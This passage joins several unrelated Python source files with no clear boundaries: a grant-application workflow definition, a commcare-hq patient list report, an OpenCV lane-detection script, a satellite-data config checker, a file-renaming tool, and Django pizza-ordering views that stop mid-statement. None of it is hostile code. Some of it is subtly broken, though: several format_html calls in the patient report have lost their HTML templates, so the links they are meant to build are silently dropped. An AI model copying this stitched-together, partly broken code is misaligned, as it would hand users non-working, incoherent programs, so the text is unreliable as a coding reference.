information required'), 'stage': RequestExt, 'permissions': applicant_edit_permissions, }, }, { 'ext_determination': { 'transitions': { 'ext_post_external_review_discussion': _('Ready For Discussion (revert)'), 'ext_almost': _('Accept but additional info required'), 'ext_accepted': _('Accept'), 'ext_rejected': _('Dismiss'), }, 'display': _('Ready for Determination'), 'permissions': hidden_from_applicant_permissions, 'stage': RequestExt, }, }, { 'ext_accepted': { 'display': _('Accepted'), 'future': _('Application Outcome'), 'stage': RequestExt, 'permissions': staff_edit_permissions, }, 'ext_almost': { 'transitions': { 'ext_accepted': _('Accept'), 'ext_post_external_review_discussion': _('Ready For Discussion (revert)'), }, 'display': _('Accepted but additional info required'), 'stage': RequestExt, 'permissions': applicant_edit_permissions, }, 'ext_rejected': { 'display': _('Dismissed'), 'stage': RequestExt, 'permissions': no_permissions, }, }, ] SingleStageCommunityDefinition = [ { DRAFT_STATE: { 'transitions': { INITIAL_STATE: { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT}, 'method': 'create_revision', }, }, 'display': _('Draft'), 'stage': RequestCom, 'permissions': applicant_edit_permissions, } }, { INITIAL_STATE: { 'transitions': { 'com_more_info': _('Request More Information'), 'com_open_call': 'Open Call (public)', 'com_internal_review': _('Open Review'), 'com_community_review': _('Open Community Review'), 'com_determination': _('Ready For Determination'), 'com_rejected': _('Dismiss'), }, 'display': _('Need screening'), 'public': _('Application Received'), 'stage': RequestCom, 'permissions': default_permissions, }, 'com_more_info': { 'transitions': { INITIAL_STATE: { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, }, 'display': _('More information required'), 'stage': RequestCom, 'permissions': applicant_edit_permissions, }, 'com_open_call': { 'transitions': { INITIAL_STATE: _('Need screening (revert)'), 'com_rejected': _('Dismiss'), }, 'display': 'Open Call (public)', 'stage': RequestCom, 'permissions': staff_edit_permissions, }, }, { 'com_internal_review': { 'transitions': { 'com_community_review': _('Open Community Review'), 'com_post_review_discussion': _('Close Review'), INITIAL_STATE: _('Need screening (revert)'), 'com_rejected': _('Dismiss'), }, 'display': _('Internal Review'), 'public': _('{org_short_name} Review').format(org_short_name=settings.ORG_SHORT_NAME), 'stage': RequestCom, 'permissions': default_permissions, }, 'com_community_review': { 'transitions': { 'com_post_review_discussion': _('Close Review'), 'com_internal_review': _('Open Internal Review (revert)'), 'com_rejected': _('Dismiss'), }, 'display': _('Community Review'), 'public': _('{org_short_name} Review').format(org_short_name=settings.ORG_SHORT_NAME), 'stage': RequestCom, 'permissions': community_review_permissions, }, }, { 'com_post_review_discussion': { 'transitions': { 'com_post_review_more_info': _('Request More Information'), 'com_external_review': _('Open External Review'), 'com_determination': _('Ready For Determination'), 'com_internal_review': _('Open Internal Review (revert)'), 'com_rejected': _('Dismiss'), }, 'display': _('Ready For Discussion'), 'stage': RequestCom, 'permissions': hidden_from_applicant_permissions, }, 'com_post_review_more_info': { 'transitions': { 'com_post_review_discussion': { 'display': _('Submit'), 'permissions': 
{UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, }, 'display': _('More information required'), 'stage': RequestCom, 'permissions': applicant_edit_permissions, }, }, { 'com_external_review': { 'transitions': { 'com_post_external_review_discussion': _('Close Review'), 'com_post_review_discussion': _('Ready For Discussion (revert)'), }, 'display': _('External Review'), 'stage': RequestCom, 'permissions': reviewer_review_permissions, }, }, { 'com_post_external_review_discussion': { 'transitions': { 'com_post_external_review_more_info': _('Request More Information'), 'com_determination': _('Ready For Determination'), 'com_external_review': _('Open External Review (revert)'), 'com_almost': _('Accept but additional info required'), 'com_accepted': _('Accept'), 'com_rejected': _('Dismiss'), }, 'display': _('Ready For Discussion'), 'stage': RequestCom, 'permissions': hidden_from_applicant_permissions, }, 'com_post_external_review_more_info': { 'transitions': { 'com_post_external_review_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, }, 'display': _('More information required'), 'stage': RequestCom, 'permissions': applicant_edit_permissions, }, }, { 'com_determination': { 'transitions': { 'com_post_external_review_discussion': _('Ready For Discussion (revert)'), 'com_almost': _('Accept but additional info required'), 'com_accepted': _('Accept'), 'com_rejected': _('Dismiss'), }, 'display': _('Ready for Determination'), 'permissions': hidden_from_applicant_permissions, 'stage': RequestCom, }, }, { 'com_accepted': { 'display': _('Accepted'), 'future': _('Application Outcome'), 'stage': RequestCom, 'permissions': staff_edit_permissions, }, 'com_almost': { 'transitions': { 'com_accepted': _('Accept'), 'com_post_external_review_discussion': _('Ready For Discussion (revert)'), }, 'display': _('Accepted but additional info required'), 'stage': RequestCom, 'permissions': applicant_edit_permissions, }, 'com_rejected': { 'display': _('Dismissed'), 'stage': RequestCom, 'permissions': no_permissions, }, }, ] DoubleStageDefinition = [ { DRAFT_STATE: { 'transitions': { INITIAL_STATE: { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT}, 'method': 'create_revision', }, }, 'display': _('Draft'), 'stage': Concept, 'permissions': applicant_edit_permissions, } }, { INITIAL_STATE: { 'transitions': { 'concept_more_info': _('Request More Information'), 'concept_internal_review': _('Open Review'), 'concept_determination': _('Ready For Preliminary Determination'), 'invited_to_proposal': _('Invite to Proposal'), 'concept_rejected': _('Dismiss'), }, 'display': _('Need screening'), 'public': _('Concept Note Received'), 'stage': Concept, 'permissions': default_permissions, }, 'concept_more_info': { 'transitions': { INITIAL_STATE: { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, 'concept_rejected': _('Dismiss'), 'invited_to_proposal': _('Invite to Proposal'), 'concept_determination': _('Ready For Preliminary Determination'), }, 'display': _('More information required'), 'stage': Concept, 'permissions': applicant_edit_permissions, }, }, { 'concept_internal_review': { 'transitions': { 'concept_review_discussion': _('Close Review'), INITIAL_STATE: _('Need screening (revert)'), 
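# From concept-note internal review, staff can close the review, revert to screening,
# or (next entry) invite the applicant straight to the proposal stage.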
'invited_to_proposal': _('Invite to Proposal'), }, 'display': _('Internal Review'), 'public': _('{org_short_name} Review').format(org_short_name=settings.ORG_SHORT_NAME), 'stage': Concept, 'permissions': default_permissions, }, }, { 'concept_review_discussion': { 'transitions': { 'concept_review_more_info': _('Request More Information'), 'concept_determination': _('Ready For Preliminary Determination'), 'concept_internal_review': _('Open Review (revert)'), 'invited_to_proposal': _('Invite to Proposal'), 'concept_rejected': _('Dismiss'), }, 'display': _('Ready For Discussion'), 'stage': Concept, 'permissions': hidden_from_applicant_permissions, }, 'concept_review_more_info': { 'transitions': { 'concept_review_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, 'invited_to_proposal': _('Invite to Proposal'), }, 'display': _('More information required'), 'stage': Concept, 'permissions': applicant_edit_permissions, }, }, { 'concept_determination': { 'transitions': { 'concept_review_discussion': _('Ready For Discussion (revert)'), 'invited_to_proposal': _('Invite to Proposal'), 'concept_rejected': _('Dismiss'), }, 'display': _('Ready for Preliminary Determination'), 'permissions': hidden_from_applicant_permissions, 'stage': Concept, }, }, { 'invited_to_proposal': { 'display': _('Concept Accepted'), 'future': _('Preliminary Determination'), 'transitions': { 'draft_proposal': { 'display': _('Progress'), 'method': 'progress_application', 'permissions': {UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'conditions': 'not_progressed', }, }, 'stage': Concept, 'permissions': no_permissions, }, 'concept_rejected': { 'display': _('Dismissed'), 'stage': Concept, 'permissions': no_permissions, }, }, { 'draft_proposal': { 'transitions': { 'proposal_discussion': {'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT}, 'method': 'create_revision'}, 'external_review': _('Open External Review'), 'proposal_determination': _('Ready For Final Determination'), 'proposal_rejected': _('Dismiss'), }, 'display': _('Invited for Proposal'), 'stage': Proposal, 'permissions': applicant_edit_permissions, }, }, { 'proposal_discussion': { 'transitions': { 'proposal_more_info': _('Request More Information'), 'proposal_internal_review': _('Open Review'), 'external_review': _('Open External Review'), 'proposal_determination': _('Ready For Final Determination'), 'proposal_rejected': _('Dismiss'), }, 'display': _('Proposal Received'), 'stage': Proposal, 'permissions': default_permissions, }, 'proposal_more_info': { 'transitions': { 'proposal_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, 'external_review': _('Open External Review'), 'proposal_determination': _('Ready For Final Determination'), 'proposal_rejected': _('Dismiss'), }, 'display': _('More information required'), 'stage': Proposal, 'permissions': applicant_edit_permissions, }, }, { 'proposal_internal_review': { 'transitions': { 'post_proposal_review_discussion': _('Close Review'), 'proposal_discussion': _('Proposal Received (revert)'), }, 'display': _('Internal Review'), 'public': _('{org_short_name} Review').format(org_short_name=settings.ORG_SHORT_NAME), 'stage': Proposal, 'permissions': default_permissions, }, }, { 'post_proposal_review_discussion': { 'transitions': { 
'post_proposal_review_more_info': _('Request More Information'), 'external_review': _('Open External Review'), 'proposal_determination': _('Ready For Final Determination'), 'proposal_internal_review': _('Open Internal Review (revert)'), 'proposal_rejected': _('Dismiss'), }, 'display': _('Ready For Discussion'), 'stage': Proposal, 'permissions': hidden_from_applicant_permissions, }, 'post_proposal_review_more_info': { 'transitions': { 'post_proposal_review_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, 'external_review': _('Open External Review'), }, 'display': _('More information required'), 'stage': Proposal, 'permissions': applicant_edit_permissions, }, }, { 'external_review': { 'transitions': { 'post_external_review_discussion': _('Close Review'), 'post_proposal_review_discussion': _('Ready For Discussion (revert)'), }, 'display': _('External Review'), 'stage': Proposal, 'permissions': reviewer_review_permissions, }, }, { 'post_external_review_discussion': { 'transitions': { 'post_external_review_more_info': _('Request More Information'), 'proposal_determination': _('Ready For Final Determination'), 'external_review': _('Open External Review (revert)'), 'proposal_almost': _('Accept but additional info required'), 'proposal_accepted': _('Accept'), 'proposal_rejected': _('Dismiss'), }, 'display': _('Ready For Discussion'), 'stage': Proposal, 'permissions': hidden_from_applicant_permissions, }, 'post_external_review_more_info': { 'transitions': { 'post_external_review_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, }, 'display': _('More information required'), 'stage': Proposal, 'permissions': applicant_edit_permissions, }, }, { 'proposal_determination': { 'transitions': { 'post_external_review_discussion': _('Ready For Discussion (revert)'), 'proposal_almost': _('Accept but additional info required'), 'proposal_accepted': _('Accept'), 'proposal_rejected': _('Dismiss'), }, 'display': _('Ready for Final Determination'), 'permissions': hidden_from_applicant_permissions, 'stage': Proposal, }, }, { 'proposal_accepted': { 'display': _('Accepted'), 'future': _('Final Determination'), 'stage': Proposal, 'permissions': staff_edit_permissions, }, 'proposal_almost': { 'transitions': { 'proposal_accepted': _('Accept'), 'post_external_review_discussion': _('Ready For Discussion (revert)'), }, 'display': _('Accepted but additional info required'), 'stage': Proposal, 'permissions': applicant_edit_permissions, }, 'proposal_rejected': { 'display': _('Dismissed'), 'stage': Proposal, 'permissions': no_permissions, }, }, ] def unpack_phases(phases): for step, step_data in enumerate(phases): for name, phase_data in step_data.items(): yield step, name, phase_data def phase_data(phases): return { phase_name: Phase(phase_name, step=step, **phase_data) for step, phase_name, phase_data in unpack_phases(phases) } Request = Workflow('Request', 'single', **phase_data(SingleStageDefinition)) RequestExternal = Workflow('Request with external review', 'single_ext', **phase_data(SingleStageExternalDefinition)) RequestCommunity = Workflow('Request with community review', 'single_com', **phase_data(SingleStageCommunityDefinition)) ConceptProposal = Workflow('Concept & Proposal', 'double', **phase_data(DoubleStageDefinition)) WORKFLOWS = { 
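# phase_data() flattens each stage definition via unpack_phases(), which yields
# (step, phase_name, phase_data) tuples, and wraps every entry in a Phase object
# keyed by its phase name. The resulting Workflow instances are registered below
# keyed by their admin_name.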
Request.admin_name: Request, RequestExternal.admin_name: RequestExternal, RequestCommunity.admin_name: RequestCommunity, ConceptProposal.admin_name: ConceptProposal, } # This is not a dictionary as the keys will clash for the first phase of each workflow # We cannot find the transitions for the first stage in this instance PHASES = list(itertools.chain.from_iterable(workflow.items() for workflow in WORKFLOWS.values())) def get_stage_change_actions(): changes = set() for workflow in WORKFLOWS.values(): stage = None for phase in workflow.values(): if phase.stage != stage and stage: changes.add(phase.name) stage = phase.stage return changes STAGE_CHANGE_ACTIONS = get_stage_change_actions() STATUSES = defaultdict(set) for key, value in PHASES: STATUSES[value.display_name].add(key) active_statuses = [ status for status, _ in PHASES if 'accepted' not in status and 'rejected' not in status and 'invited' not in status ] def get_review_active_statuses(user=None): reviews = set() for phase_name, phase in PHASES: if phase_name in active_statuses: if user is None: reviews.add(phase_name) elif phase.permissions.can_review(user): reviews.add(phase_name) return reviews def get_review_statuses(user=None): reviews = set() for phase_name, phase in PHASES: if 'review' in phase_name and 'discussion' not in phase_name: if user is None: reviews.add(phase_name) elif phase.permissions.can_review(user): reviews.add(phase_name) return reviews def get_ext_or_higher_statuses(): """ Returns a set of all the statuses for all workflow which are External Review or higher than that. """ ext_review_or_higher_statuses = set() for workflow in WORKFLOWS.values(): step = None for phase in workflow.values(): if phase.display_name == 'External Review': # Update the step for this workflow as External review state step = phase.step # Phase should have step higher or equal than External # review state for this workflow if step and phase.step >= step: ext_review_or_higher_statuses.add(phase.name) return ext_review_or_higher_statuses def get_accepted_statuses(): accepted_statuses = set() for phase_name, phase in PHASES: if phase.display_name == 'Accepted': accepted_statuses.add(phase_name) return accepted_statuses def get_dismissed_statuses(): dismissed_statuses = set() for phase_name, phase in PHASES: if phase.display_name == 'Dismissed': dismissed_statuses.add(phase_name) return dismissed_statuses ext_or_higher_statuses = get_ext_or_higher_statuses() review_statuses = get_review_statuses() accepted_statuses = get_accepted_statuses() dismissed_statuses = get_dismissed_statuses() DETERMINATION_PHASES = list(phase_name for phase_name, _ in PHASES if '_discussion' in phase_name) DETERMINATION_RESPONSE_PHASES = [ 'post_review_discussion', 'concept_review_discussion', 'post_external_review_discussion', 'ext_post_external_review_discussion', 'com_post_external_review_discussion', ] def get_determination_transitions(): transitions = {} for phase_name, phase in PHASES: for transition_name in phase.transitions: if 'accepted' in transition_name: transitions[transition_name] = 'accepted' elif 'rejected' in transition_name: transitions[transition_name] = 'rejected' elif 'more_info' in transition_name: transitions[transition_name] = 'more_info' elif 'invited_to_proposal' in transition_name: transitions[transition_name] = 'accepted' return transitions def get_action_mapping(workflow): # Maps action names to the phase they originate from transitions = defaultdict(lambda: {'display': '', 'transitions': []}) if workflow: phases = workflow.items() 
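# When a specific workflow is passed, only that workflow's phases are scanned;
# otherwise (see the else branch) every phase across all registered workflows is used.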
else: phases = PHASES for phase_name, phase in phases: for transition_name, transition in phase.transitions.items(): transition_display = transition['display'] transition_key = slugify(transition_display) transitions[transition_key]['transitions'].append(transition_name) transitions[transition_key]['display'] = transition_display return transitions DETERMINATION_OUTCOMES = get_determination_transitions() def phases_matching(phrase, exclude=list()): return [ status for status, _ in PHASES if status.endswith(phrase) and status not in exclude ] PHASES_MAPPING = { 'received': { 'name': _('Received'), 'statuses': [INITIAL_STATE, 'proposal_discussion'], }, 'internal-review': { 'name': _('Internal Review'), 'statuses': phases_matching('internal_review'), }, 'in-discussion': { 'name': _('Ready for Discussion'), 'statuses': phases_matching('discussion', exclude=[INITIAL_STATE, 'proposal_discussion']), }, 'more-information': { 'name': _('More Information Requested'), 'statuses': phases_matching('more_info'), }, 'invited-for-proposal': { 'name': _('Invited for Proposal'), 'statuses': ['draft_proposal'], }, 'external-review': { 'name': _('External Review'), 'statuses': phases_matching('external_review'), }, 'ready-for-determination': { 'name': _('Ready for Determination'), 'statuses': phases_matching('determination'), }, 'accepted': { 'name': _('Accepted'), 'statuses': phases_matching('accepted'), }, 'dismissed': { 'name': _('Dismissed'), 'statuses': phases_matching('rejected'), }, } OPEN_CALL_PHASES = [ 'com_open_call', ] COMMUNITY_REVIEW_PHASES = [ 'com_community_review', ] omari-funzone/commcare-hq from datetime import datetime, timedelta from couchdbkit import ResourceNotFound from django.utils.translation import ugettext_noop from sqlagg.base import AliasColumn from sqlagg.columns import SimpleColumn from sqlagg.filters import EQ, IN from corehq.apps.groups.dbaccessors import get_group_id_name_map_by_user from corehq.apps.groups.models import Group from corehq.apps.reports.datatables import DTSortType from corehq.apps.reports.sqlreport import DatabaseColumn, AggregateColumn, SqlTabularReport, DataFormatter, \ TableDataFormat from corehq.apps.reports.util import get_INFilter_bindparams from corehq.util.dates import iso_string_to_datetime from custom.succeed.reports.patient_interactions import PatientInteractionsReport from custom.succeed.reports.patient_task_list import PatientTaskListReport from custom.utils.utils import clean_IN_filter_value from memoized import memoized from corehq.apps.cloudcare.api import get_cloudcare_app from corehq.apps.cloudcare.utils import webapps_module_case_form from corehq.apps.reports.standard import CustomProjectReport, ProjectReportParametersMixin from django.utils.html import format_html from custom.succeed.reports import EMPTY_FIELD, CM7, CM_APP_CM_MODULE, OUTPUT_DATE_FORMAT from custom.succeed.utils import is_succeed_admin, SUCCEED_CM_APPNAME, has_any_role, get_app_build, SUCCEED_DOMAIN def target_date(visit_name, visit_days, randomization_date): if visit_name != 'last': tg_date = ((randomization_date + timedelta(days=int(visit_days))) - datetime.utcnow().date()).days if tg_date >= 7: output_html = (randomization_date + timedelta(days=int(visit_days))).strftime("%m/%d/%Y") elif 7 > tg_date > 0: output_html = " In %s day(s)" % tg_date elif tg_date == 0: output_html = "Today" else: output_html = "%s day(s) overdue" % (tg_date * (-1)) else: output_html = EMPTY_FIELD tg_date = -1000000 return { 'html': output_html, 'sort_key': tg_date * (-1) } def 
date_format(date_str): """ >>> date_format('2015-02-10 11:54:24') '02/10/2015' >>> date_format('2015-02-10 11:54:24.004000') '02/10/2015' """ if date_str: # this comes in with a ' ' instead of 'T' for some reason # would be nice to go back and figure out where that happens # probably `date_str = unicode(dt)` happens somewhere if ' ' in date_str and not date_str.endswith('Z'): date_str = date_str.replace(' ', 'T') + 'Z' date = iso_string_to_datetime(date_str) return date.strftime(OUTPUT_DATE_FORMAT) else: return EMPTY_FIELD def group_name(owner_id): results = get_group_id_name_map_by_user(owner_id, limit=1) if results: return results[0].name else: try: return Group.get(owner_id).name except ResourceNotFound: return "No Group" def edit_link(case_id, app_dict, latest_build): module = app_dict['modules'][CM_APP_CM_MODULE] form_idx = [ix for (ix, f) in enumerate(module['forms']) if f['xmlns'] == CM7][0] case_form_link = webapps_module_case_form( domain=app_dict['domain'], app_id=latest_build, module_id=CM_APP_CM_MODULE, form_id=form_idx, case_id=case_id) return format_html("Edit", case_form_link) def case_link(name, case_id): url = PatientInteractionsReport.get_url(*[SUCCEED_DOMAIN]) + "?patient_id=%s" % case_id if url: return { 'html': format_html("{}", url, name), 'sort_key': name } else: return "%s (bad ID format)" % name def tasks(case_id): url = PatientTaskListReport.get_url(*[SUCCEED_DOMAIN]) + "?patient_id=%s&task_status=open" % case_id if url: return format_html("Tasks", url) else: return "%s (bad ID format)" % case_id class PatientListReport(SqlTabularReport, CustomProjectReport, ProjectReportParametersMixin): name = ugettext_noop('Patient List') slug = 'patient_list' use_datatables = True table_name = 'fluff_UCLAPatientFluff' base_template = 'succeed/patient_list_report.html' fields = ['custom.succeed.fields.CareSite', 'custom.succeed.fields.PatientStatus'] @classmethod def show_in_navigation(cls, domain=None, project=None, user=None): if domain and project and user is None: return True if user and (is_succeed_admin(user) or has_any_role(user)): return True return False @property @memoized def rendered_report_title(self): return self.name @property def config(self): patient_status = self.request.GET.get('patient_status', None) cate_site = self.request.GET.get('care_site_display') is_active = None if patient_status: is_active = 'True' if patient_status == 'active' else 'False' owner_ids = [] user = self.request.couch_user if not user.is_web_user(): owner_ids = [user._id] + user.get_group_ids() return { 'domain': self.domain, 'is_active': is_active, 'care_site': cate_site.lower() if cate_site else None, 'owner_id': tuple(owner_ids) } @property def filters(self): filters = [EQ('domain', 'domain')] if 'is_active' in self.config and self.config['is_active']: filters.append(EQ('is_active', 'is_active')) if 'care_site' in self.config and self.config['care_site']: filters.append(EQ('care_site', 'care_site')) if 'owner_id' in self.config and self.config['owner_id']: filters.append(IN('owner_id', get_INFilter_bindparams('owner_id', self.config['owner_id']))) return filters @property def filter_values(self): return clean_IN_filter_value(super(PatientListReport, self).filter_values, 'owner_id') @property def columns(self): app_dict = get_cloudcare_app(SUCCEED_DOMAIN, SUCCEED_CM_APPNAME) latest_build = get_app_build(app_dict) return [ DatabaseColumn('Modify Schedule', SimpleColumn('doc_id', alias='case_id'), format_fn=lambda x: edit_link(x, app_dict, latest_build)), AggregateColumn('Name', 
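# The 'Name' column aggregates the raw patient name with the aliased case_id and
# renders it as a link to the patient's interactions report via case_link() above.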
aggregate_fn=case_link, columns=[SimpleColumn('name'), AliasColumn('case_id')], sort_type=''), DatabaseColumn('MRN', SimpleColumn('mrn')), DatabaseColumn('Randomization Date', SimpleColumn('date', alias='rand_date')), DatabaseColumn('Visit Name', SimpleColumn('visit_name', alias='vis_name')), AggregateColumn('Target Date', aggregate_fn=target_date, columns=[ AliasColumn('vis_name'), SimpleColumn('visit_days'), AliasColumn('rand_date') ], sort_type=DTSortType.NUMERIC), DatabaseColumn('Most Recent', SimpleColumn('bp_category')), DatabaseColumn('Last Interaction Date', SimpleColumn('last_interaction'), format_fn=date_format), DatabaseColumn('Tasks', AliasColumn('case_id'), format_fn=tasks), DatabaseColumn('Care Team', SimpleColumn('owner_id'), format_fn=group_name) ] @property def group_by(self): return ['case_id', 'name', 'mrn', 'rand_date', 'vis_name', 'visit_days', 'bp_category', 'last_interaction', 'owner_id'] @property def rows(self): formatter = DataFormatter(TableDataFormat(self.columns, no_value=self.no_value)) return formatter.format(self.data, keys=self.keys, group_by=self.group_by) import cv2 import imutils from imutils import perspective import numpy as np from scipy.optimize import fsolve from time import sleep def polyFit(xAxis, yAxis, degree): equation = list() if degree is 1: equation.append(np.polyfit(xAxis, yAxis, 1)[0]) equation.append(np.polyfit(xAxis, yAxis, 1)[1]) else: equation = [] return equation def convertToEquation(lines, image): equations = list() if lines is not None: for line in lines: x1, y1, x2, y2 = line.reshape(4) equations.append(polyFit((x1, x2), (image.shape[0] - y1, image.shape[0] -y2), 1)) return equations def drawEquations(image, equations): copyImage = image for equation in equations: y1 = 0 y2 = image.shape[0] x1 = int(solveInverseOfEquation(equation, y1)) x2 = int(solveInverseOfEquation(equation, y2)) print((x1, x2), (image.shape[0] - y1, image.shape[0] - y2)) cv2.line(copyImage, (x1, image.shape[0] - y1), (x2, image.shape[0] - y2), 120, 10) return copyImage def solveInverseOfEquation(equation, x): inverseEquation = [1/equation[0], -equation[1]/equation[0]] # func = np.poly1d(equation) # invFunc = np.poly1d(inverseEquation) print(equation, " ", inverseEquation) print((inverseEquation[0] * x) + inverseEquation[1]) return (inverseEquation[0] * x) + inverseEquation[1] def lineOperations(equations): equationsWithCloseValues = list() closeIndexes = list() equations.sort() for (i, test_equation1) in enumerate(equations, 0): for (j, test_equation2) in enumerate(equations, 0): diff = abs(np.arctan(test_equation1[0]) - np.arctan(test_equation2[0])) * 180/np.pi if (diff < 20) and (not equations[j] in closeIndexes): closeIndexes.append(test_equation2) if closeIndexes not in equationsWithCloseValues: equationsWithCloseValues.append(closeIndexes) closeIndexes = list() topThreeInLength = sortTheArrayLen(equationsWithCloseValues) TheReliableThreeLines = list() for line in sorted(topThreeInLength): # print(line) # print(" ") slopes = list() for s in line: slopes.append(s[0]) intercepts = list() for i in line: intercepts.append(i[1]) meanSlope = np.mean(slopes) meanIntercept = np.mean(intercepts) # print(meanSlope, meanIntercept) TheReliableThreeLines.append([meanSlope, meanIntercept]) return TheReliableThreeLines def sortTheArrayLen(array): theIndexList = list() for (i, l1) in enumerate(array): theIndexList.append([len(l1), i]) theIndexList = sorted(theIndexList, reverse=True) theTopThree = list() for t in theIndexList[:3]: indexNumber = t[1] 
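# Each theIndexList entry is [cluster_size, original_index]; only the three clusters
# backed by the most Hough line segments are kept.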
theTopThree.append(array[indexNumber]) return theTopThree def warpImage(testImage): pts = np.array([(int(testImage.shape[1] * 0.25), int(testImage.shape[0] * 0.0)), (int(testImage.shape[1] * 0.75), int(testImage.shape[0] * 0.0)), (testImage.shape[1] * 0, testImage.shape[0] * 1), (testImage.shape[1] * 1, testImage.shape[0] * 1)]) warped = perspective.four_point_transform(testImage.copy(), pts) # print(warped) return warped frame = cv2.imread("test_image.jpg", 0) ############### IMAGE TAKING COMPLETE ################################# ############### IMAGE PRE PROCESS START ################################# cv2.imshow("actual frame", frame) frame = warpImage(frame[int(frame.shape[0]*0.50):int(frame.shape[0]),:]) blurred = cv2.GaussianBlur(frame, (15, 15), 0) cannyImage = cv2.Canny(blurred, 80, 220) cannyImage = cv2.GaussianBlur(cannyImage, (3, 3), 0) ############### IMAGE PRE PROCESS DONE ################################# ############### FINDING THE LINES ################################# thresh_area = 40 minLineLength = int(frame.shape[0]*0.333) maxLineGap = int(frame.shape[0]*0.333) lines = cv2.HoughLinesP(cannyImage, 3, np.pi/30, thresh_area, np.array([]), minLineLength=minLineLength, maxLineGap=maxLineGap) equationsg = convertToEquation(lines, cannyImage) Reliables = lineOperations(equationsg) drawnImage = drawEquations(frame, Reliables) ############### FINDING THE LINES DONE ################################# cv2.imshow("testImage", frame) cv2.imshow("blurred", blurred) cv2.imshow("canny image", cannyImage) # cv2.imshow("warped", warped) cv2.imshow("line image", drawnImage) cv2.waitKey(0) import os import journal import pybind_nisar.workflows.helpers as helpers from pybind_nisar.workflows.runconfig import RunConfig class UnwrapRunConfig(RunConfig): def __init__(self, args): super().__init__(args, 'insar') if self.args.run_config_path is not None: self.load_geocode_yaml_to_dict() self.geocode_common_arg_load() self.yaml_check() def yaml_check(self): ''' Check phase_unwrap specifics from YAML ''' error_channel = journal.error('CrossmulRunConfig.yaml_check') # Check if crossmul_path is provided (needed for stand-alone unwrapping) if self.cfg['processing']['phase_unwrap']['crossmul_path'] is None: err_str = "'crossmul_path' file path under `phase_unwrap' required for standalone execution with YAML" error_channel.log(err_str) raise ValueError(err_str) # Allocate, if not present, cfg related to user-unwrapper choice algorithm = self.cfg['processing']['phase_unwrap']['algorithm'] if algorithm not in self.cfg['processing']['phase_unwrap']: self.cfg['processing']['phase_unwrap'][algorithm] = {} # Check if crossmul path is a directory or a file crossmul_path = self.cfg['processing']['phase_unwrap']['crossmul_path'] if not os.path.isfile(crossmul_path): err_str = f"{crossmul_path} is invalid; needs to be a file" error_channel.log(err_str) raise ValueError(err_str) # Check if required polarizations/frequency are in crossmul_path file freq_pols = self.cfg['processing']['input_subset']['list_of_frequencies'] helpers.check_hdf5_freq_pols(crossmul_path, freq_pols) import logging from glob import glob from pathlib import Path from ..core.filesystem import rename_files, rename_folders from ..model.filesystem import OptionParser, Options from . 
import common logger = logging.getLogger(__name__) def rename(options: Options): function = rename_folders if options.dir_mode else rename_files result = function( options.workdir, options.pattern, options.to, ignore_case=not options.case_sensitive, recursive=options.recursive ) if not result: logger.warning( f"Değişiklik yapılmadı: {options.pattern=} {options.to=}" ) def main(): args = OptionParser().parse_args() log_level = logging.DEBUG if args.debug else logging.INFO common.initialize_logging(level=log_level) for path in args.paths: paths = [Path(p) for p in glob(path)] for path in paths: if path.is_dir(): options = Options.from_system_args(path) rename(options) else: logger.error(f"{path.name} is not valid path") if __name__ == "__main__": main() import os import re from django.contrib import messages from django.contrib.auth import authenticate, login, logout from django.contrib.auth.models import User from django.core.exceptions import ObjectDoesNotExist from django.http import HttpResponse, HttpResponseRedirect, JsonResponse from django.shortcuts import render from django.urls import reverse import stripe from .models import Addition, CartItem, DinnerPlatter, Order, Pasta, RegularPizza, Salad, SicilianPizza, Sub, Topping STRIPE_SECRET_KEY = os.getenv("STRIPE_SECRET_KEY") STRIPE_PUBLIC_KEY = os.getenv("STRIPE_PUBLIC_KEY") DOMAIN = os.getenv("DOMAIN") stripe.api_key = STRIPE_SECRET_KEY # Create your views here. def index(request): if not request.user.is_authenticated: return HttpResponseRedirect(reverse("login_view")) regular_pizzas = RegularPizza.objects.all() sicilian_pizzas = SicilianPizza.objects.all() subs = Sub.objects.all() pasta = Pasta.objects.all() salads = Salad.objects.all() dinner_platters = DinnerPlatter.objects.all() cart_items = CartItem.objects.filter( user=request.user, pending=False ) return render(request, "orders/index.html", { "regular_pizzas": regular_pizzas, "sicilian_pizzas": sicilian_pizzas, "subs": subs, "pasta": pasta, "salads": salads, "dinner_platters": dinner_platters, "cart_items": cart_items }) def register(request): if request.method == "POST": username = request.POST.get("username") email = request.POST.get("email") password = request.POST.get("password") confirmation = request.POST.get("confirmation") first_name = request.POST.get("first_name") last_name = request.POST.get("last_name") pattern = re.compile(r'\d.*?[A-Z].*?[a-z].*[^\da-zA-Z]') if not first_name: messages.error(request, "First Name may not be left blank.") return render(request, "orders/register.html") elif not last_name: messages.error(request, "Last Name may not be left blank.") return render(request, "orders/register.html") elif not username: messages.error(request, "Username may not be left blank.") return render(request, "orders/register.html") elif User.objects.filter(username=username).exists(): messages.error(request, "Username is unavailabe.") return render(request, "orders/register.html") elif not email: messages.error(request, "Email may not be left blank.") return render(request, "orders/register.html") elif User.objects.filter(email=email).exists(): messages.error(request, "User with this email already exists.") return render(request, "orders/register.html") elif not password: messages.error(request, "Password may not be left blank.") return render(request, "orders/register.html") elif 